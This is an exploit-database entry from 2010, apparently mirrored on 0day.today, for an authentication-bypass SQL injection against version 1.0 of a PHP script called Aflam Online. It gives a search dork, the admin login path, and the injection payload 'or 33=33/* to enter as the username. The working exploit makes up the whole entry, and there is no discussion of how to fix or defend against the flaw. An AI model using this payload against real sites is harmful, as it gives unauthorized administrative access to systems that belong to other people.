id: 10793
date: 02/05/2010
title: Aflam Online (Auth Bypass) SQL Injection
author: alnjm33
cves: 

========================================
Aflam Online (Auth Bypass) SQL Injection
========================================


 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : Aflam Online (Auth Bypass) SQL Injection
Tested on: Version 1.0
My home : Sec-war.com
need magic_quotes_gpc = Off
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                                 (By : E3sar al3ra8 script aflam online  )
================================Exploit=============================================
go to login page
http://SITE/path/admincp
exploit
put username = 'or 33=33/*
Password =  Security War
=======================================================================================




#  0day.today [2023-03-25]  #